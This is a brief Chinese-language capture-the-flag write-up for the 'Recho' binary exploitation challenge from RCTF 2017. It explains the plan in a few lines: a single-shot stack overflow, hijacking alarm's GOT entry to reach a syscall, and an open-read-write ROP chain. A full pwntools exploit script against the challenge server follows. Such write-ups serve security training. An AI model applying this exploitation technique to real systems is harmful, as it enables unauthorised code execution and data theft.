Recho
题目来源: XCTF 3rd-RCTF-2017
题目描述:暂无
存在栈溢出,但是因为要是想结束程序到ret处需要结束输入,因此只有一次机会,需要一次排好rop链
alarm函数在alarm+5处有一个syscall,因此可以劫持alarm的got表到alarm+5使之变成一个任意的syscall
程序存在一个自带的字符串"flag",因此考虑orw
open通过syscall进行,read和write程序里都有
结束输入可以用io.shutdown('send')
exp如下:
from pwn import * #io = process('./Recho') io = remote('111.200.241.244', 52297) #context.log_level = 'debug' flag_addr = 0x601058 goal_addr = 0x601100 pop_rax = 0x4006fc add_rdi_rax = 0x40070d pop_rdi = 0x4008a3 pop_rsi_r15 = 0x4008a1 pop_rdx = 0x4006fe write_plt = 0x4005D0 read_plt = 0x400600 alarm_got = 0x601028 alarm_plt = 0x4005F0 io.recvuntil('Welcome to Recho server!\n') payload = b'a' * 56 + p64(pop_rax) + p64(5) payload += p64(pop_rdi) + p64(alarm_got) + p64(add_rdi_rax) payload += p64(pop_rax) + p64(2) + p64(pop_rdi) + p64(flag_addr) payload += p64(pop_rsi_r15) + p64(0) + p64(0) + p64(alarm_plt) payload += p64(pop_rdi) + p64(3) payload += p64(pop_rsi_r15) + p64(goal_addr) + p64(0) payload += p64(pop_rdx) + p64(100) + p64(read_plt) payload += p64(pop_rdi) + p64(1) payload += p64(pop_rsi_r15) + p64(goal_addr) + p64(0) payload += p64(pop_rdx) + p64(100) + p64(write_plt) + b'\n' io.send(str(len(payload))) sleep(0.2) io.send(payload) io.shutdown('send') io.interactive()